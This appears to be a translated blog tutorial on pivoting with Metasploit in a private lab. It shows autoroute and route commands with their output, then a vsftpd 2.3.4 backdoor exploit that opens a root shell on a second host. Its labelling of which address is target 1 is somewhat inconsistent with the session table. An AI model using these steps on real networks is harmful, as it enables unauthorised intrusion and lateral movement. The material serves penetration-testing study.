Foreword
This article gives a brief introduction to using Metasploit to set up a pivot (jump host) for attacking further targets.
I. Adding routing entries
Adding routing entries:
As for the routing table, I do not have a deep understanding of how Metasploit adds routing entries; the following is for reference only.
Method one:
Use run autoroute -p/-s
① Function introduction
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Usage: run autoroute [-r] -s subnet -n netmask
[*] Examples:
[*] run autoroute -s 10.1.1.0 -n 255.255.255.0 # Add a route to 10.10.10.1/255.255.255.0
[*] run autoroute -s 10.10.10.1 # Netmask defaults to 255.255.255.0
[*] run autoroute -s 10.10.10.1/24 # CIDR notation is also okay
[*] run autoroute -p # Print active routing table
[*] run autoroute -d -s 10.10.10.1 # Deletes the 10.10.10.1/255.255.255.0 route
[*] Use the "route" and "ipconfig" Meterpreter commands to learn about available routes
② Procedure
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] No routes have been added yet
meterpreter > run autoroute -s 192.168.1.112
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.1.112/255.255.255.0...
[+] Added route to 192.168.1.112/255.255.255.0 via 192.168.1.106
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================

   Subnet         Netmask        Gateway
   ------         -------        -------
   192.168.1.112  255.255.255.0  Session 1
meterpreter >
Method two:
Use run get_local_subnets together with the console's route command
① Function introduction
Route traffic destined to a given subnet through a supplied session.
Usage:
route [add/remove] subnet netmask [comm/sid]
route [add/remove] cidr [comm/sid]
route [get] <host or network>
route [flush]
route [print]
Subcommands:
add - make a new route
remove - delete a route; 'del' is an alias
flush - remove all routes
get - display the route for a given target
print - show all active routes
Examples:
Add a route for all hosts from 192.168.0.0 to 192.168.0.255 through session 1
route add 192.168.0.0 255.255.255.0 1
route add 192.168.0.0/24 1
Delete the above route
route remove 192.168.0.0/24 1
route del 192.168.0.0 255.255.255.0 1
Display the route that would be used for the given host or network
route get 192.168.0.11
② Procedure
meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.1.0/255.255.255.0
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/ms08_067_netapi) > route add 192.168.1.0 255.255.255.0 1
[*] Route added
msf6 exploit(windows/smb/ms08_067_netapi) > route print
IPv4 Active Routing Table
=========================

   Subnet         Netmask        Gateway
   ------         -------        -------
   192.168.1.0    255.255.255.0  Session 1
   192.168.1.112  255.255.255.0  Session 1
[*] There are currently no IPv6 routes defined.
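As an added illustration (not code from the original post or from Metasploit itself), the following Python models how a route table like the one printed above is consulted: each Subnet/Netmask pair is a network, the Gateway column names the session the traffic is sent through, and a destination is matched by longest prefix, which is the question route get answers. The sample table is constructed from the two entries above plus one made-up 10.0.0.0/16 entry on a hypothetical session 3, so that longest-prefix selection is visible.

```python
import ipaddress
from typing import List, Optional, Tuple

# Constructed sample: the two routes printed by "route print" above, plus a
# made-up /16 entry via a hypothetical session 3 to show prefix selection.
ROUTE_PRINT_OUTPUT = """\
IPv4 Active Routing Table
=========================

   Subnet         Netmask        Gateway
   ------         -------        -------
   192.168.1.0    255.255.255.0  Session 1
   192.168.1.112  255.255.255.0  Session 1
   10.0.0.0       255.255.0.0    Session 3
"""

Route = Tuple[ipaddress.IPv4Network, int]


def parse_routes(text: str) -> List[Route]:
    """Parse 'route print' style lines into (network, session_id) pairs.

    A host address given with a mask (192.168.1.112 / 255.255.255.0, as
    produced by 'run autoroute -s 192.168.1.112') is normalised to its
    network, 192.168.1.0/24, because that is what a lookup compares against.
    """
    routes: List[Route] = []
    for line in text.splitlines():
        parts = line.split()
        # Data rows look like: <subnet> <netmask> Session <id>
        if len(parts) != 4 or parts[2] != "Session":
            continue
        subnet, netmask, _, sid = parts
        net = ipaddress.IPv4Network(f"{subnet}/{netmask}", strict=False)
        routes.append((net, int(sid)))
    return routes


def route_get(routes: List[Route], target: str) -> Optional[int]:
    """Longest-prefix match, like 'route get <host>'.

    Returns the session id that traffic to target would be relayed through,
    or None when no route matches (traffic would leave the console host
    directly rather than through any session).
    """
    addr = ipaddress.IPv4Address(target)
    best: Optional[Route] = None
    for net, sid in routes:
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, sid)
    return best[1] if best else None
```

In this model the autoroute entry 192.168.1.112/255.255.255.0 covers exactly the same network as the route add entry 192.168.1.0/24, so the table above effectively holds one route, not two.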
II. Carrying out the attack
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.1.112:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.112:21 - USER: 331 Please specify the password.
[+] 192.168.1.112:21 - Backdoor service has been spawned, handling...
[+] 192.168.1.112:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 8 opened (192.168.1.106:1947 -> 192.168.1.112:6200) at 2021-06-05 11:01:10 +0800
arp
Address        HWtype  HWaddress          Flags Mask  Iface
192.168.1.113  ether   00:0C:29:23:E3:CD  C           eth0
192.168.1.106  ether   00:0C:29:95:E3:EA  C           eth0
192.168.1.1    ether   94:D9:B3:12:6F:C0  C           eth0
background
Background session 8? [y/N] y
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > sessions

Active sessions
===============
(See the information below.)

  Id  Name  Type                     Information                    Connection
  --  ----  ----                     -----------                    ----------
  6         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WINXP-1  192.168.1.113:4444 -> 192.168.1.106:1279 (192.168.1.106)
  8         shell cmd/unix                                          192.168.1.106:1947 -> 192.168.1.112:6200 (192.168.1.112)
As the last line of the listing above shows, after target 2 is attacked, the connection runs from target 1 (192.168.1.106) to target 2 (192.168.1.112).
Summary
This article has briefly introduced using Metasploit to set up a pivot for penetration testing of a target; it is intended for study purposes only.